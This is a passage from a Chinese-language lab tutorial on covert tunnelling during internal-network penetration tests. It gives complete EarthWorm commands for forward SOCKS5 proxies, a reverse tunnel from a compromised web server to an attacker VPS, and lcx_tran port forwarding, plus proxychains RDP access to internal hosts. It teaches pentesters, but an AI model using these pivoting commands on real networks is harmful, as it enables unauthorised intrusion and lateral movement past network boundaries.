内网渗透测试：隐藏通讯隧道技术（下）(5)

测试环境：左侧有一个人计算机，为攻击者的计算机，位于攻击者的内网中，攻击者还有一台公网中的vps；右侧是一个受害内网，有三台机器，我们已经控制的web服务器有两个网卡，是连接外网和内网的关键节点，内网其他机器之间均不能直接连接。

（1）正向 SOCKS 5 服务器

适用于目标机器拥有一个外网IP地址的情况下，如上图内网web服务器的模拟外网IP为192.168.1.7。在web服务器上面上传对应的ew程序并执行：

ew_for_Win.exe -s ssocksd -l 888

打开内网Windows server 8的远程桌面：

proxychains4 rdesktop 192.168.52.138

正向 SOCKS 5 服务器适用于目标机器拥有一个外网IP地址的情况下，假设目标机器没有公网IP的情况下，我们怎么访问内网的资源呢？

在这个测试环境中，与上一个相似，只是web服务器没有了公网IP，但能上网；VPS是真的公网vps了。

在攻击者公网vps上面上传ew_for_linux64并执行：

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

该命令的意思是在vps上添加一个转接隧道，监听1234，把本地1234端口收到的代理请求转交给1080端口，这里1234端口只是用于传输流量。

ew_for_Win.exe -s rssocks -d 39.xxx.xxx.210 -e 1234

该命令的意思是在受害者web服务器上启动SOCKS5服务，并反弹到公网IP地址为39.xxx.xxx.210的1234端口上。此时vps上面显示“rssocks cmd_socket OK!”说明连接成功：

proxychains4 rdesktop 192.168.52.141

适用于目标机器拥有一个外网IP地址的情况下。

我们先将ew上传至B主机上面，并用ssocksd方式启动1234端口的正向socks代理：

ew_for_Win.exe -s ssocksd -l 1234

ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.52.138 -g 1234